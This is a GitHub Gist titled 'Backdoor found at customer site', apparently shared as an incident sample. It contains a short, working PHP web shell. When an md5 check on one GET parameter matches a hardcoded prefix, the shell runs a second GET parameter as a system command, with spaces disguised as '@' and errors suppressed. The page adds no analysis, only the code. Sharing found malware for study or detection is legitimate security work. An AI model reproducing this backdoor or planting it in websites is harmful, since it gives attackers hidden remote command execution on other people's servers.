-
-
Save mostafahussein/3fb8b3701506dc005235 to your computer and use it in GitHub Desktop.
Backdoor found at customer site
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") { | |
$time = str_replace("@"," ",$_GET["localtime"]); | |
@system($time); exit; | |
} | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment